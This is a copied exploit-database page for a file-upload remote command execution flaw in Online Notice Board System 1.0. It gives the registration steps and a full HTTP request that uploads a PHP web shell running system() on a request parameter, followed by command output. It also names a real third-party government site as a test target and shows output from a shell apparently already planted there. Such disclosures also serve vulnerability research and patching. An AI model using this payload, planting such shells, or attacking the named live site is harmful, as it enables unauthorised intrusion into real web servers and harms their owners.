Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080077

Below is a copy:

Online Notice Board System 1.0 - Remote Command Execution (RCE) throw upload file
# Date: 2020-08-13
# Exploit Author: Mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14317/online-notice-board-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14317&title=Online+Notice+Board+System+in+PHP+Free+Source+Code
# Version: Version 1.0
# Category: Web Application
# Tested on: Kali Linux

#Description:  allows an attacker to register and upload shell file.

#Step 1: register with this link http://localhost/onbs/index.php?option=New_user

#Step 2: Enter the information like username ,email ,data and shell file

#step 3: then go to this path /onbs/images/[email protected]/shell.php

#example :

POST /onbs/index.php?option=New_user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------32859291944290603147363660265
Content-Length: 1705
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/onbs/index.php?option=New_user
Cookie: PHPSESSID=b7j92ccoqit6fgrbnjps3rb010
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="n"
test
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="e"
[email protected]
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="p"
[email protected]
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="mob"
966555555555
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="gen"
m
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="hob[]"
reading
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="hob[]"
singin
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="hob[]"
playing
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="img"; filename="m.php"
Content-Type: application/x-php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="yy"
1996
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="mm"
6
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="dd"
7
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="save"
Save
-----------------------------32859291944290603147363660265--

#then you will see your shell here

#http://localhost/onbs/images/[email protected]/m.php?cmd=id

#uid=33(www-data) gid=33(www-data) groups=33(www-data)

#here website for test : http://www.sumajktccl.go.tz/onbs/

https://www.sumajktccl.go.tz/onbs/images/[email protected]/re.php?cmd=id
uid=1195(sumacclgo) gid=1188(sumacclgo) groups=1188(sumacclgo)

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.